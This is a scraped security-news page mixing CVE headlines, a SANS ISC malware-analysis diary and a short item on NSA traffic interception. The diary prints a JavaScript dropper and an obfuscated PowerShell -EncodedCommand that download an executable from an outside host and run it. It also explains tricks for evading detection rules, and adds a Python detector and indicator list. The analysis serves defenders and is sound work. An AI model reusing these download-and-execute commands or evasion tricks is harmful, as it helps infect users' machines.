util-linux CVE-2017-2616 Local Denial of Service Vulnerability
 
IBM TRIRIGA Application Platform CVE-2017-1171 Unspecified Remote Privilege Escalation Vulnerability
 
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
IBM Algo One CVE-2017-1154 Unauthorized Access Vulnerability
 
Xen 'xenstore' Denial of Service Vulnerability
 
CentreCOM AR260S V2 CVE-2017-2125 Privilege Escalation Vulnerability
 

Sometimes you may find very small pieces of malicious code. Yesterday, I caught this very small JavaScript sample with only 2 lines of code:

    var d=new ActiveXObject("Shell.NormandApplication".replace("Normand",""));
    d.ShellExecute("PowerShell","((New-Object System.Net.WebClient).DownloadFile('http://[redacted].exe','xwing.pif'));Start-Process 'xwing.pif'","","",

There is no real obfuscation here, just a trick to avoid detection of the string "Shell.Application", which automated tools often search for: the ProgID is only assembled at runtime by the replace() call, so a static grep of the file never sees it.

Sometimes there is no need to implement complex code to bypass detection. A good example comes with PowerShell, which accepts a Base64-encoded (UTF-16LE) script on the command line via -EncodedCommand [1]. Since parameter names are case-insensitive, the whole invocation can be mangled like this:

    poWERShElL.Exe -ExECutioNPolicy bYpAsS -NOPrOFiLe -WindOwsTyLe HiddEN -enCodEdCoMMANd \
    IAAoAG4ARQB3AC0AbwBiAGoAZQBjAFQAIABTAHkAUwBUAGUAbQAuAE4AZQB0AC4AVwBFAGIAQwBsAG\
    kARQBOAHQAKQAuAEQAbwB3AE4ATABvAGEARABGAEkAbABFACgAIAAdIGgAdAB0AHAAcwA6AC8ALwBh\
    AHIAaQBoAGEAbgB0AHQAcgBhAGQAZQByAHMAbgBnAHAALgBjAG8AbQAvAGkAbQBhAGcAZQBzAC8AUw\
    BjAGEAbgBfADIALgBlAHgAZQAdICAALAAgAB0gJABlAG4AdgA6AFQARQBtAFAAXABvAHUAdABwAHUA\
    dAAuAGUAeABlAB0gIAApACAAOwAgAGkAbgBWAG8AawBFAC0ARQB4AFAAUgBlAHMAUwBJAG8ATgAgAB\
    0gJABFAE4AdgA6AHQARQBNAFAAXABvAHUAdABwAHUAdAAuAGUAeABlAB0g

The decoded command is:

    (nEw-objecT SySTem.Net.WEbCliENt).DowNLoaDFIlE( ”https://arihanttradersngp.com/images/Scan_2.exe” , ”$env:TEmP\output.exe” ) ; inVokE-ExPResSIoN ”$ENv:tEMP\output.exe”

Note the curly quotes (U+201D) around the strings: PowerShell's parser accepts them as ordinary string delimiters, so a rule that keys on straight double or single quotes does not match this payload.

Nothing fancy and easy to decode, but this trick will bypass most default security controls. A good idea is to fine-tune your regular expressions and filters to catch the -EncodedCommand switch case-insensitively, and to remember that powershell.exe also accepts any abbreviation of the parameter name (-e, -ec, -enc, ...) and a leading "/" instead of "-", so match those forms too.

Note that the PE file is downloaded over HTTPS, so network-level content inspection will not see the binary unless TLS is intercepted.
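As an added example (not code from the diary, from SANS or from the malware author), the following Python applies the two lessons above to process-creation command lines: it finds and decodes an -EncodedCommand payload the way powershell.exe resolves the switch (case-insensitive, "-" or "/" prefix, any prefix of the parameter name down to a lone -e, plus the -ec alias), folds the curly quotes that PowerShell accepts as string delimiters before running keyword rules over the decoded script, and flags new ActiveXObject(...) calls whose ProgID is computed rather than written as a literal, as in the two-line JavaScript sample. The Base64 blob is the one quoted in the diary; the surrounding command lines, the JavaScript snippet and the indicator list are constructed for this example.

```python
"""Added example, not code from the ISC diary: decode and flag PowerShell
-EncodedCommand invocations the way powershell.exe itself parses them, and
spot the computed-ProgID ActiveXObject trick from the JavaScript sample."""
import base64
import re
from typing import List, Optional

# powershell.exe accepts '-' or '/' as the switch prefix, ignores case, resolves
# any prefix of "EncodedCommand" down to a lone "-e", and also accepts "-ec".
_PARAM = "encodedcommand"
_SWITCHES = {_PARAM[:i] for i in range(1, len(_PARAM) + 1)} | {"ec"}
ENCODED_SWITCH = re.compile(
    r"(?:^|\s)[-/](?:" + "|".join(sorted(_SWITCHES, key=len, reverse=True)) + r")"
    r"\s+[\"']?([A-Za-z0-9+/=]{16,})",
    re.IGNORECASE,
)

# PowerShell's tokenizer treats these Unicode quotes as ordinary string delimiters;
# the payload on this page uses U+201D, which a rule looking for " or ' never sees.
_QUOTE_MAP = {ord(c): '"' for c in "\u201c\u201d\u201e"}
_QUOTE_MAP.update({ord(c): "'" for c in "\u2018\u2019\u201a\u201b"})

# Constructed indicator list (name -> regex over the normalised, lower-cased script).
INDICATORS = {
    "downloadfile": r"downloadfile",
    "downloadstring": r"downloadstring",
    "frombase64string": r"frombase64string",
    "invoke-expression": r"invoke-expression|\biex\b",
    "start-process": r"start-process",
    "temp-path": r"\$env:temp",
}


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script carried by -EncodedCommand (Base64 of UTF-16LE), or None."""
    m = ENCODED_SWITCH.search(cmdline)
    if not m:
        return None
    b64 = m.group(1)
    b64 += "=" * (-len(b64) % 4)  # restore padding that some loaders strip
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def normalize(script: str) -> str:
    """Fold curly quotes and case so rules see what the PowerShell parser sees."""
    return script.translate(_QUOTE_MAP).lower()


def indicators(script: str) -> List[str]:
    """Names of the INDICATORS present in the normalised script, in table order."""
    text = normalize(script)
    return [name for name, pat in INDICATORS.items() if re.search(pat, text)]


def computed_progids(js: str) -> List[str]:
    """Arguments of new ActiveXObject(...) that are not a single string literal.
    A literal ProgID can be grepped for; a computed one such as
    "Shell.NormandApplication".replace("Normand","") cannot."""
    found = []
    for m in re.finditer(r"new\s+ActiveXObject\s*\(", js):
        depth, i = 1, m.end()
        while i < len(js) and depth:  # walk to the matching close paren
            depth += {"(": 1, ")": -1}.get(js[i], 0)
            i += 1
        arg = js[m.end():i - 1].strip()
        if not re.fullmatch(r"(\"[^\"]*\"|'[^']*')", arg):
            found.append(arg)
    return found


# The Base64 blob quoted in the diary, with its line continuations removed.
BLOB = (
    "IAAoAG4ARQB3AC0AbwBiAGoAZQBjAFQAIABTAHkAUwBUAGUAbQAuAE4AZQB0AC4AVwBFAGIAQwBsAG"
    "kARQBOAHQAKQAuAEQAbwB3AE4ATABvAGEARABGAEkAbABFACgAIAAdIGgAdAB0AHAAcwA6AC8ALwBh"
    "AHIAaQBoAGEAbgB0AHQAcgBhAGQAZQByAHMAbgBnAHAALgBjAG8AbQAvAGkAbQBhAGcAZQBzAC8AUw"
    "BjAGEAbgBfADIALgBlAHgAZQAdICAALAAgAB0gJABlAG4AdgA6AFQARQBtAFAAXABvAHUAdABwAHUA"
    "dAAuAGUAeABlAB0gIAApACAAOwAgAGkAbgBWAG8AawBFAC0ARQB4AFAAUgBlAHMAUwBJAG8ATgAgAB"
    "0gJABFAE4AdgA6AHQARQBNAFAAXABvAHUAdABwAHUAdAAuAGUAeABlAB0g"
)
# Constructed command lines: the diary's invocation, and the same payload behind
# an abbreviated switch with a '/' prefix that a rule anchored on "-encodedcommand" misses.
SAMPLE_CMDLINE = (
    "poWERShElL.Exe -ExECutioNPolicy bYpAsS -NOPrOFiLe -WindOwsTyLe HiddEN -enCodEdCoMMANd " + BLOB
)
SHORT_CMDLINE = "powershell /e " + BLOB

if __name__ == "__main__":
    for line in (SAMPLE_CMDLINE, SHORT_CMDLINE):
        script = decode_encoded_command(line)
        print(line[:32], "->", indicators(script) if script else "no encoded command")
```

Run it directly to see both constructed command lines decode to the same script and trip the same indicators; in a pipeline, feed decode_encoded_command the CommandLine field of process-creation events (Sysmon event ID 1, Windows 4688) and alert on any non-empty indicator list.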

[1] https://blogs.msdn.microsoft.com/timid/2014/03/26/powershell-encodedcommand-and-round-trips/

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key


 
 
Siklu EtherHaul radios CVE-2016-10308 Insecure Default Password Vulnerability
 
Multiple Trango devices CVE-2016-10307 Insecure Default Password Vulnerability
 
Trango Altum AC600 Devices CVE-2016-10306 Insecure Default Password Vulnerability
 
Multiple VMware Products CVE-2017-4903 Memory Corruption Vulnerability
 
Multiple VMware Products CVE-2017-4904 Memory Corruption Vulnerability
 
Multiple VMware Products CVE-2017-4902 Heap-Based Buffer Overflow Vulnerability
 
Microsoft Edge CVE-2016-7201 Scripting Engine Remote Memory Corruption Vulnerability
 
Multiple Flexense Products CVE-2017-7310 Buffer Overflow Vulnerability
 
Wordpress BuddyPress Plugin CVE-2017-6954 Security Bypass Vulnerability
 
Exponent CMS CVE-2016-7788 SQL Injection Vulnerability
 
MODX Revolution CMS Multiple Security Vulnerabilities
 
Apache Ambari CVE-2016-4976 Local Information Disclosure Vulnerability
 
XOOPS CVE-2017-7290 SQL Injection Vulnerability
 
Multiple Siklu EtherHaul Devices CVE-2017-7318 Remote Command Execution Vulnerability
 
RSA Archer Security Operations Management with RSA UCF Local Information Disclosure Vulnerability
 
Apache Camel CVE-2017-5643 Server Side Request Forgery Security Bypass Vulnerability
 


A couple of years ago, when I was investigating the UK's safest ISP, a high-ranking employee at Virgin Media told me there was no NSA or GCHQ Internet traffic interception equipment hiding within Virgin's network. He also said that, in his opinion, not much traffic interception actually occurs in the UK. I asked him why. "Because they don't need to. They'll get your data when it lands in the US."

While it's not true that all Internet traffic flows through the US, the addition of a few listening posts at key Internet exchanges in Europe (London, Paris) and some in Asia (Hong Kong, Tokyo) ensures that the NSA and its Five Eyes partners can analyse and ingest the majority of international Internet traffic.

To visualise the extent of the NSA's surveillance network, IXmaps has created a tool that shows you the location of suspected Internet traffic interception points. You can input your own traceroute data, or if you're in a rush you can just bring up traceroute data from people living in the same city or using the same ISP. Then click the "layers" button and turn on NSA, AT&T/Fairview, and Verizon/Stormbrew.


 
Huawei TIT-AL00 CVE-2017-2735 Local Security Bypass Vulnerability
 
Ubuntu AppArmor CVE-2017-6507 Security Bypass Vulnerability
 
EMC Isilon OneFS CVE-2017-4980 Directory Traversal Vulnerability
 
Google Chrome CVE-2017-5055 Use After Free Memory Corruption Vulnerability
 
Google Chrome and Chrome OS Multiple Security Vulnerabilities
 
[security bulletin] HPESBHF03723 rev.1 - HPE Aruba ClearPass Policy Manager, using Apache Struts, Remote Code Execution
 
[security bulletin] HPESBUX03725 rev.1 - HPE HP-UX Web Server Suite running Apache, Multiple Vulnerabilities
 